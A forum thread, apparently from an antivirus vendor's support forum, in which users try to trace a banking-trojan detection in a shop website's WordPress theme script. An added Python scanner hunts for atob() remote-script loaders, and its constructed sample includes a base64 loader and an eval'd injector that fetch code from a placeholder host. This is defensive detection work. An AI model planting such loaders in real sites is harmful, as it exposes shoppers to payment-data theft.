AnthonyIT, posted June 13, 2023:

Hi Team, One of our clients purchases equipment from the following website: https://ilsau.com.au. The website frequently triggers the JS/Spy.Banker.KY trojan when browsing (usually adding an item to a shopping trolley will trigger it). The specific file that ESET flags is https://ilsau.com.au/wp-content/themes/ils2020/assets/js/app.js?ver=2.1.0. We've contacted the company that owns the website; however, they're unable to track down the threat. Would someone be able to provide some clues on where they should look? Thank you, Anthony
Marcos (Administrator), posted June 13, 2023:

Is the threat still being detected? I've added some goods to the cart and proceeded to checkout but didn't get any alert. Another user posted elsewhere that he found the source of infection in PHP files in the "classes" folder.
AnthonyIT (author), posted June 13, 2023:

Thanks for looking at it, Marcos. It is still triggering a detection. This product seems to trigger without even adding it to the cart: https://ilsau.com.au/product/tens-machine-protens/
Nevermind, posted June 13, 2023:

Main page ilsau[.]com.au has this in it: <_script type='text/javascript' src='hxxps://ilsau[.]com.au/wp-content/themes/ils2020/assets/js/app.js?ver=2.1.0' id='il2020-app-js-js'></script>

The loaded app.js contains a line with the 'atob' function that loads another/unwanted JS from a remote server. That's all we can see from a visitor's point of view. Until you (or a specialized company) clean the server, the detection will always trigger.
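The loader pattern Nevermind describes (a base64 string fed to atob() that turns into a remote script source) can be hunted for statically in the theme's JS files on the server. The script below is an added example written for this thread; it is not ESET's detection logic and it does not contain the real app.js content, which was never posted here. The sample JavaScript it scans is constructed, the host example.invalid is a placeholder, and the allow-list of the site's own hostname is an assumption: any atob() payload that decodes to a URL on another host, or that contains a script-injection primitive, is reported with its line number and decoded text so the site owner knows exactly what to look at.

```python
"""Static scan of JavaScript files for atob()-based remote-script loaders.

Added example for this thread; it is not ESET's detection logic and not the
real content of ilsau.com.au's app.js (which was never posted here). The
sample JS below is constructed to resemble the pattern described: a base64
string decoded with atob() that ends up as a remote script source.
"""
import base64
import binascii
import re
import sys
from dataclasses import dataclass, field
from urllib.parse import urlparse

# atob('....') with a base64-alphabet payload; the quote character is captured in group 1
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
# URLs inside the decoded payload (stops at quotes, whitespace and brackets)
URL_RE = re.compile(r"""https?://[^\s'"<>()]+""", re.IGNORECASE)
# Decoded payloads that inject or execute code are suspicious regardless of host
INJECT_RE = re.compile(r"""createElement\(\s*['"]script|\beval\(|document\.write""")


@dataclass
class Finding:
    line_no: int            # 1-based line in the scanned file
    decoded: str            # what atob() would return in the browser
    foreign_urls: list = field(default_factory=list)  # URLs not on an allowed host


def decode_b64(payload: str) -> str:
    """Decode like the browser's atob(): ignore whitespace, repair missing padding."""
    cleaned = re.sub(r"\s+", "", payload)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")


def scan_js(text: str, allowed_hosts=()) -> list:
    """Return a Finding for every atob() call whose decoded content references a
    host outside allowed_hosts or contains a script-injection primitive."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in ATOB_RE.finditer(line):
            try:
                decoded = decode_b64(m.group(2))
            except (binascii.Error, ValueError):
                continue  # not valid base64; the browser's atob() would throw too
            foreign = [u for u in URL_RE.findall(decoded)
                       if urlparse(u).hostname not in allowed_hosts]
            if foreign or INJECT_RE.search(decoded):
                findings.append(Finding(line_no, decoded, foreign))
    return findings


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample file (NOT the real app.js): one benign atob() and two loader patterns.
SAMPLE_APP_JS = "\n".join([
    "// constructed sample, not the real ilsau.com.au theme script",
    "jQuery(function($){ $('.add-to-cart').on('click', addToCart); });",
    "var label = atob('" + _b64("hello") + "');",                          # benign text
    "var u = atob('" + _b64("https://example.invalid/loader.js") + "');",  # remote URL
    "var s = document.createElement('script'); s.src = u; document.head.appendChild(s);",
    "eval(atob('" + _b64('var t=document.createElement("script");'
                         't.src="https://example.invalid/x.js";'
                         'document.head.appendChild(t);') + "'));",        # eval'd injector
])


def scan_file(path: str, allowed_hosts=()) -> list:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_js(fh.read(), allowed_hosts)


if __name__ == "__main__":
    # Usage: python atob_scan.py ilsau.com.au wp-content/themes/ils2020/assets/js/*.js
    # With no file arguments, the constructed sample above is scanned instead.
    own_host = sys.argv[1] if len(sys.argv) > 1 else "ilsau.com.au"
    targets = sys.argv[2:]
    results = ([(p, scan_file(p, (own_host,))) for p in targets] if targets
               else [("<constructed sample>", scan_js(SAMPLE_APP_JS, (own_host,)))])
    for name, hits in results:
        for h in hits:
            print(f"{name}:{h.line_no}: atob() -> {h.decoded[:80]!r} foreign={h.foreign_urls}")
```

Run it against the theme directory on the server's filesystem rather than against what a browser receives: a file fetched over HTTP only shows the version served to that visitor, and as the thread goes on to discuss, the injected code may not be served to every visitor every time. Anything the scan reports is a starting point for the clean-up, not proof of the whole infection; Marcos's note about PHP files in the "classes" folder is the other place to look, since server-side code is what writes the loader into the page.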
LesRMed, posted June 13, 2023:

8 hours ago, AnthonyIT said: "This product seems to trigger without even adding it to the cart: https://ilsau.com.au/product/tens-machine-protens/"

Just FYI, it doesn't trigger anything when I access it or even add it to the shopping cart.
Marcos (Administrator), posted June 13, 2023:

Maybe the malicious JS is injected only when the user is from the "right" country, in this case from Australia.
itman, posted June 13, 2023:

4 hours ago, Marcos said: "Maybe the malicious JS is injected only when the user is from the "right" country, in this case from Australia."

I couldn't get an Eset detection when accessing https://ilsau.com.au/product/tens-machine-protens/ from the U.S. I got as far as the web page for entry of ID and credit card payment details.

-EDIT- I also disabled uBlock Origin and still could not get an Eset detection. However, Firefox still has native protections built into it, and I do have those set to "Strict" mode. The question is whether Eset will throw a detection for Edge, Chrome, etc.
AnthonyIT (author), posted June 14, 2023:

Thank you for all your responses. I've passed this information on to the website owners in the hope it will give them some more clues as to where to look. Note that the product I linked before, https://ilsau.com.au/product/tens-machine-protens/, is no longer triggering an alert; however, clicking around the site (going into products, hitting the back button, etc.) eventually triggers it. It almost appears random in nature, and the malicious JS is generated on the fly. I'm running ESET Endpoint Security 10.0.2045.0, detection engine version 27404, Chrome version 114.0.5735.110. Will report back here if I have any more info.
Nevermind, posted June 14, 2023:

16 hours ago, itman said: "The question is if Eset will throw a detection for Edge, Chrome, etc.?"

It will.